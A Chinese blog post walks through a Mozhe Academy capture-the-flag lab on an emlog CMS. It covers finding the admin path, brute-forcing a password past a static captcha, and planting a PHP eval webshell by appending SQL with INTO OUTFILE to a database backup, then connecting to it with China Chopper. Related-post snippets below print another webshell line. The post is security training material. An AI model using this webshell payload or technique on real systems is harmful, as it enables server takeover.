墨者学院-CMS系统漏洞分析溯源(第6题)

最新推荐文章于 2024-07-23 01:29:17 发布
最新推荐文章于 2024-07-23 01:29:17 发布
阅读量408 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100540241
版权

CMS系统漏洞分析溯源(第6题)

难易程度:★★★
题目类型:配置错误
使用工具:FireFox浏览器、burpsuite、direbuster

1.打开靶场,扫描一下网站。
我用了御剑和wwwscan都扫不出后台,最后用disbuster扫到了/servlets,但是响应301。尝试访问,不成功。这里是个坑,在/servlets后加多个/成功访问。
在这里插入图片描述
2.我们看到个人信息为mozhe777,尝试弱口令,登陆失败,但是发现了验证码不会变。
打开burpsuite,send to intruder暴力破解。找到密码为qwer1234。
在这里插入图片描述
3.登录后台,选择数据,备份emlog_blog数据库。
在这里插入图片描述
4.在数据库尾部加上sql语句。

drop table if exists emlog_shell;
create table emlog_shell(`cmd` longtext not null);
insert into emlog_shell values("<?php @eval($_POST['c']);?>");
select cmd from emlog_shell into outfile '/var/www/html/getshell.php';
drop table if exists emlog_shell;

在这里插入图片描述
5.保存,导入本地备份。
在这里插入图片描述
6.访问/getshell.php不显示没有该文件,证明上传成功。
7.打开菜刀连接。url为http://219.153.49.228:44240/getshell.php,密码为c。
在这里插入图片描述
8.在C盘根目录下找到key文件,打开获取key。
在这里插入图片描述

JimWu95
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CMS系统漏洞分析溯源(第6)
weixin_50698958的博客
10-07 342
靶场: https://www.mozhe.cn/bug/detail/Yy9vUVVqcWNmWEpKdFh4dTFheHVZdz09bW96aGUmozhe 背景介绍 安全工程师"墨者"的朋友搭建一个emlog个人博客系统,为了确保该系统的安全性,请你检测该系统是否存在安全漏洞。 实训目标 1、了解验证码绕过的相关知识; 2、了解后台地址扫描及其他相关漏洞资料; 3、了解后台常用账户密码的利用方式; 解方向 进入后台,找到后台中可利用的地方getshell; 解思路: 1、使用
墨者学院 - CMS系统漏洞分析溯源(第5)
多崎巡礼的博客
10-29 1605
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php &lt;?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?&gt;   判断如果没有admin_na...
墨者学院(4个sql靶场攻略)
最新发布
a96482的博客
07-23 1105
首先我们要购买并启动靶场点击访问跳转页面,获得KEY后在这里提交该提示POST方式提交,我们需要通过burpsuite抓包在name后加单引号测试发现有sql注入,那我们就按照sql手工注入流程来这里发现联合注入(name='1 union select 1,2,3 #)直接得出KEY最后提交KEY完成。
墨者 - CMS系统漏洞分析溯源(第6)
吃肉唐僧的博客
07-22 479
打开环境,根据目提示 上网搜索emlog博客的后台地址,一般为/admin 但是访问失败,应该是改过路径了 用御剑扫描后台(坑点),只扫出以下地址 分别访问这些地址都没有后台的,后来看别人的解思路才发现 别人一扫就出来了(换了很多个版本,珍藏版,目录优化版,加强字典版.....均扫不出,一把泪) 这里参考https://blog.csdn.net/weixin_43884770...
墨者学院CMS系统漏洞分析溯源(第6)
weixin_43884770的博客
12-19 734
墨者学院-CMS系统漏洞分析溯源(第7)
JimWu的博客
09-04 973
CMS系统漏洞分析溯源(第7) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms的漏洞。 知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫,然后打开burpsuite,访问/member/resetpassword.php,截包。 我们send to repeater,修改get的参数 ?...
墨者学院-CMS系统漏洞分析溯源(第4)
JimWu的博客
09-04 821
CMS系统漏洞分析溯源(第4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
墨者学院 - CMS系统漏洞分析溯源(第4)
多崎巡礼的博客
10-09 1045
使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...
墨者学院_CMS系统漏洞分析溯源(第9)
weixin_50698958的博客
09-23 622
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
墨者学院-XWAY科技管理系统V3.0
lianliandad的博客
09-15 3412
妙啊
墨者学院 - 密码学加解密实训(Zip伪加密)
多崎巡礼的博客
09-18 1702
zip格式文件伪加密 实践是检验真理的唯一标准 简介 zip文件是一种压缩文件,可进行加密,也可不加密。而伪加密是在未加密的zip文件基础上修改了它的压缩源文件目录区里的全局方式位标记的比特值,使得压缩软件打开它的时候识别为加密文件,提示输入密码, 而在这个时候,不管你用什么软件对其进行密码破解,都无法打开它!这就是它存在的意义! zip官方文档zip中文详解 文件组成 压缩源...
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4176
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
墨者学院 - WebShell代码分析溯源(第1)
多崎巡礼的博客
07-27 1280
下载源码 使用seay源代码审计系统扫一扫(实在不想一个个去看。。。) seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg     下载出源代码,找到cn-right.php   &lt;?php error_reporting(0); $_GET['POST']($_POST['GET']); ?&gt; ...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)教程
weixin_57682301的博客
07-22 212
在地址栏输入 and 1=1--+判断是否有sql注入,当1=2时页面消失证明网页有SQL注入。使用联合查询将有回显的数值改为你要查看的数据库信息,下图找出了数据库名以及数据表名。使用order by判断有几列,当order by为5时页面消失,证明有4列。可以看出密码是md5加密过的,在网上找个解密就可以找到密码了。根据给出的name以及password查出数据表中的值。首先启动环境进入页面,点击下方公告。再使用数据表名查出表中各列的名。
墨者学院】WebShell文件上传漏洞分析溯源(第2)
m0_66835614的博客
11-28 1244
墨者学院】WebShell文件上传漏洞分析溯源(第2)
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值